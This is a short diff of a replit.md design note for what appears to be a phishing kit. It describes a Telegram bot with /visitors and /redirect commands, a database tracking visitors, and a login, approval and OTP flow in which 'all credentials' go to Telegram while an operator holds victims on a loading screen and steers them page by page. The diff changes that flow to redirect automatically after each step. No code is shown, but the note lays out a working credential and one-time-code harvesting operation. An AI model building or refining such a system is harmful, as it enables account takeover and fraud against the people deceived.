u6875270078-ship-it/update/replit.md

     - `POST /api/check-redirect`: Checks if visitor has pending redirect, returns and clears it.
 - **Telegram Bot**: Long-polling bot that handles admin commands (`/visitors`, `/redirect`, `/help`).
 - **Data Storage**: PostgreSQL database with `visitors` table tracking all visitor data and redirect targets.
-- **Authentication Flow**: Multi-step with two-attempt login, loading screen (admin controlled), OTP with 2 attempts.
+- **Authentication Flow**: Multi-step flow with automatic redirects to loading page after each successful step (login, approval, OTP).
+Loading screen is admin controlled - visitors wait there until admin redirects them.
 All credentials sent to Telegram.
 Admin controls all page transitions via redirect system.

 ### System Design Choices
 - **UI Design**: A mix of professional marketing imagery for the homepage, minimalist monochrome aesthetic for authentication flows (Login/Loading/OTP), and positive green-accented design for Success page.